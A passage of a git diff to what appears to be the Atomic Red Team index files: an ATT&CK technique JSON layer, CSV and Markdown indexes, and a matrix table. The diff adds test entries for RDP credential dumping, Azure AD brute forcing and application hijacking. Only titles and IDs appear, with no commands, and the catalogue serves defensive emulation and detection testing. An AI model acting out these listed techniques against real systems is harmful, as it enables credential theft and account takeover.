/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index b8f07370..f2257e0e 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -55,10 +55,12 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
@@ -494,7 +496,9 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
-persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a548ba38..d25c3572 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -9,6 +9,7 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -153,7 +154,9 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
-persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index cb774351..b338da52 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -39,6 +39,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 8469a3a7..21b70104 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -91,6 +91,7 @@
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
+ - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
@@ -98,6 +99,7 @@
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
+ - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
@@ -853,7 +855,9 @@
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
+ - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
+ - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
+ - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d44165af..678b201a 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -30,7 +30,8 @@
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
+ - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
@@ -412,7 +413,9 @@
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
+ - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
+ - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
+ - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index ef36826f..d85cc21e 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -69,6 +69,7 @@
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
+ - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index ca519231..1b4a0a45 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -21,7 +21,7 @@
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
